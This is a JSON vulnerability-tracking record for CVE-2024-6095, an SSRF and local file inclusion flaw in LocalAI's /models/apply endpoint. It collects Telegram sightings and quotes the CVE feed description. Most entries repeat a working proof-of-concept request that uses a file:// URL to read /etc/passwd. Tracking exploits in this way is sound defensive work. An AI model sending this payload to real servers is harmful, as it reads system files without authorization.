{"vulnerability": "CVE-2024-6095", "sightings": [{"uuid": "c5361875-7b8d-4ee4-a8b6-fb2195f302fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3088", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-08-31T07:50:44.000000Z"}, {"uuid": "a682d6c7-cff8-4492-924a-f57b65b0379e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/fattahh_ir/2727", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-09-01T10:34:35.000000Z"}, {"uuid": "265db545-c276-41c6-ba50-33e87a8e826d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1884", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-09-01T00:52:55.000000Z"}, {"uuid": "dd7f40db-30f2-48d9-a6ef-9710ea9fe6f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1868", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-08-30T08:38:48.000000Z"}, {"uuid": "7f0280b5-31c3-48c9-bf30-ebeff85666ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18150", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-08-30T16:48:20.000000Z"}, {"uuid": "a6e24a51-d577-4138-a37d-ff2c7481e7cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "Telegram/gExMF3sHIW8CrL_a-38ogXkaozkkP9VqJlzooQMuhYzpzQ", "content": "", "creation_timestamp": "2024-08-30T08:39:42.000000Z"}, {"uuid": "6068f315-6634-4706-846d-d37b2c4a12cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18317", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-09-01T16:43:26.000000Z"}, {"uuid": "6ff83a1f-b04f-4c2d-9ca5-f16f45567f94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "Telegram/sE-LFBykdILB5V7LepgUFtQYsi484fAF7CX1rAUmm_ATlsU", "content": "", "creation_timestamp": "2024-08-30T08:38:49.000000Z"}, {"uuid": "e05366c2-898d-4b1d-9161-a3326aaad784", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "seen", "source": "https://t.me/cvedetector/152", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-6095 - A vulnerability in the /models/apply endpoint of m\", \n  \"Content\": \"CVE ID : CVE-2024-6095 \nPublished : July 6, 2024, 6:15 p.m. | 22\u00a0minutes ago \nDescription : A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s):// and file:// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17. \nSeverity: 5.8 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-06T20:41:09.000000Z"}]}